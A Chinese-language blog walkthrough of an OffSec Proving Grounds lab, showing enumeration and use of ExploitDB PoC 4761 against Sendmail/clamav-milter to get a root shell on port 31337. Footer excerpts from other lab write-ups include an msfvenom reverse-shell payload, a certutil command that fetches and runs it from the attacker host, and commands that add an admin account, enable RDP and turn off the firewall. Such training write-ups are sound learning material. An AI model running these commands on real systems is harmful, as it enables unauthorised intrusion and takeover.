Proving Grounds Practice : ClamAV Walkthrough

-

 Proving Grounds Practice : ClamAV Walkthrough


Foothole (立足點 ) :

  • 80 Port 網站逛了一圈沒發現,gobuster 也沒啥資訊
  • 445 跑 enum4linux 也沒有啥鳥用
  • 25 Port 使用的是 Sendmail 但事實上是因為有另一個套件叫做 clamAV 才有漏洞可以利用
  • 依據 PoC 執行後開啟一個 31337 Port 的 Shell 可以進去

PE ( 提權 ) :

  • 不用 PE,進去就是 Root

注意事項 :

  • 枚舉、枚舉、枚舉很重要所以說三次
  • 這一題很賤故意在 snmp 中讓你看 clamAV 的套件
  • 名言 : 當你找不到洞的時候表示你枚舉不夠 SNMP 有開就一定有鬼,就看你有沒有辦法注意到


第一步 Rustscan,└─$ rustscan -a 192.168.194.42 --scripts none  --ulimit 5000 | tee rustscan


snmp open,└─$ sudo nmap -sU -p 161 192.168.194.42 | tee snmp,有開就有看頭



nmap snmp 列舉加上 -sCV 再掃一次

└─$ sudo nmap -sCV -sU -p 161 192.168.194.42 | tee snmp



snmp check,└─$ snmp-check 192.168.194.42




Process 發現一個很特別的服務 clamav-milter




snmp extend MIB check,└─$ snmpwalk -v 1 -c public 192.168.194.42 NET-SNMP-EXTEND-MIB::nsExtendOutputFull
看起來就是沒有裝 MIB



sudo apt-get install snmp-mibs-downloader 裝完再跑一次沒有啥發現


換這個試試看,└─$ snmpwalk -v 1 -c public 192.168.194.42 NET-SNMP-EXTEND-MIB::nsExtendObjects
也沒有啥發現



nmap,└─$ sudo nmap -sCV -A -p 22,25,80,139,199,445,60000 192.168.194.42 | tee nmap

25/tcp    open  smtp        Sendmail 8.13.4/8.13.4/Debian-3sarge3

80/tcp    open  http        Apache httpd 1.3.33 ((Debian GNU/Linux))

60000/tcp open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)



enum4linux,└─$ enum4linux -a 192.168.194.42 | tee enum4linux








80 /

很特別的網頁內容



轉換看看,轉換二進位 --> ifyoudontpwnmeuran0b




80 /robots.txt




gobuster,└─$ gobuster -w ./dirfuzzing.txt dir -u http://192.168.194.42 -t 150 -k -x txt,pdf,git,php | tee gobuster



Searchsploit sendmail 沒有符合的版本 但有看到一個 with clamav 4761 看來就是它了

因為在 snmp 有發現一樣的 Process,又是 RCE 當然要先試試看



Exploit DB 上還有看到 Metasploit,寫黑洞模式好特別



跑跑看,但是沒有結果



直接看 4761 的內容



內容看起來是用 25 Port 寄信進去然後用 root 權限開一個 31337 Port 的 /bin/sh Listener



4761 是個 pl 檔,那就直接 perl 跑跑看

告訴我們給他一個 host 連線



加上 IP 執行看看 └─$ perl 4761.pl 192.168.194.42

看起來有成功了


nmap 31337 Port 看看,看來有開

一開始的 rustscan 沒有這個 Port 現在有,表示 PoC 是成功的



直接 nc 帶參數 -nv 進去看看,whoami & id 看一下已經是 root 了



留言

張貼留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

-
圖片
Challenge 0 - Secura(2) 下一步就是先想辦法進入第二台 .96 Rustscan 看一下,看來這一台的梗在 3306 MySQL 上 測試了一下遠端 IP 被阻擋進入 MySQL 從已經打入的第一台 .95(SECURE) 搭建 chisel 去登入 .96 的 MySQL 看來也不行 先在第一台 .95 建立一個使用者 aries 與密碼 Oscp#1234 net user aries Oscp#1234 /add 加入到本機的 administrators 群組 net localgroup administrators aries /add 開啟 RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 關掉 firewall netsh advfirewall set allprofiles state off RDP 進去開始枚舉,└─$ xfreerdp -v:192.168.204.95 -u:aries -p:'Oscp#1234' +clipboard -cert:ignore -drive:aries,/home/kali/lab0/95 網域簡名 SECURA 網域全名 secura.yzx 這一台有跑 PostgreSQL DB 跑在本機的 127.0.0.1 15432 Port 查找 *.kdbx & *.zip 發現 PostgreSQL 帳號密碼 postgres:appmanager 測試帳號密碼有效 甚麼都不能執行也找不到有用的資訊 暫時沒有方向,回到 .97 先枚舉使用者看看 ./kerbrute_linux_amd64 userenum --dc 192.168.204.97 -d secura.yzx -o kerbrute-user-enum xato-net-10-million-usernames.txt 獲得使用者帳號 michael、charlotte、secure、administrator、era 這幾個使用者都沒有 ASREP ./GetNPUsers....
閱讀完整內容

Challenge 0 - Secura(1)

-
圖片
 Challenge 0 - Secura(1) Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧 環境說明共三台機器,簡單掃了一下  - 95 : Web Server 感覺像是進入點  - 96 : DB 伺服器  - 97 : DC 95 8443 Port 打開是 AppManager14 版本是 14710 使用預設帳號密碼 admin:admin 可以直接登入 跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功 5001 / 參考 Pentest Everything :  https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus 自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe 接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ] 設定執行的檔案為 cmd.bat 建立一個 cmd.bat,內容如下 certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe 上傳 cmd.bat 執行該 Script,成功拿到 Rever Shell whoami 看一下,進來就是 nt authority\system 直接拿 flag 跑一下 mimikatz.exe administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14 測試看看 e...
閱讀完整內容

Challenge 8 - Poseidon(0)

-
圖片
 Challenge 8 - Poseidon(0) 最近真的新的 LAB 連發,又多了一個 Challenge 8 : Poseidon 剛好近期有空,開來看看吧,又是一個三台的組合,應該又是 AD 題組 跟前一個題組 zeus 很像,都是三台面向使用者沒有內網的機器 ping 看看,看來三台都是 Windows Rustscan 掃掃看,看來第一台一樣是 DC └─$ rustscan -a 192.168.163.161 --scripts none --ulimit 5000 | tee rustscan 第二台看來也像 DC └─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第三台,└─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第一台 161 nmap 資訊 Domain : poseidon.yzx,電腦名稱 dc01 NetBIOS_Domain_Name : poseidon 第二台 162 nmap 資訊 這一台看來是 Sub Domain 的 DC,FQDN: dc02.sub.poseidon.yzx NetBIOS_Domain_Name : sub 第三台 163 nmap 資訊 ldapsearch 161,ldapsearch -v -x -b "DC=poseidon,DC=yzx" -H "ldap://192.168.163.161" "(objectclass=*)" ldapsearch 162,ldapsearch -v -x -b "DC=sub,DC=poseidon,DC=yzx" -H "ldap://192.168.163.162" "(objectclass=*)" 預設 smbclient 列舉都爬不到東西 帶入 poseidon\guest & sub\guest SMB 也都爬不到資訊 爬看看 161 Domain 的使用者,└─$ ./kerbrute_linux_amd64...
閱讀完整內容